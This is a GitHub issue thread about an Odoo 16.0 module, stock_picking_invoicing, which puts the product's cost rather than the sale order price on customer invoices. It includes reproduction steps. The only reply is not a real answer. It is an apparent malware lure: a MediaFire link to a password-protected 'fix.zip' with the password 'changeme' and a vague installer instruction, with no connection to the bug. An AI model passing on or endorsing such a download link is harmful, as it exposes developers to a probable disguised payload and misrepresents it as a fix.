### ISSUE TITLE
stock_picking_invoicing: behavior on pricing for out_invoice kind

### ISSUE THREAD

**Issue by bealdav** [OCA/account-invoicing#1786]
## Module
stock_picking_invoicing 16.0

## Describe the bug
This module use price_unit to define price in invoice
![image](https://github.com/user-attachments/assets/efdd4d03-4206-4a58-aef3-acc2148f5365)

https://github.com/odoo/odoo/blob/b8bd68caed6472c6e3416bec9017aa2d23194fb4/addons/stock/models/stock_move.py#L113-L116

If price_unit is the cost, how can I make a an out_invoice with a valid price in combination of sale.order.

It seems that this flow should be forbidden in the code to avoid a such problem.

## To Reproduce
**Affected versions**:

1. Define a sale order with a specific price 
2. Deliver the product with picking
3. Create invoice from picking
4. Compare price in invoice and in sale

**Expected behavior**
If sale module is installed, Prices defined in sale order lines should be the default value for the invoice lines, not the price_unit value

**Additional context**
Used with sale module

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
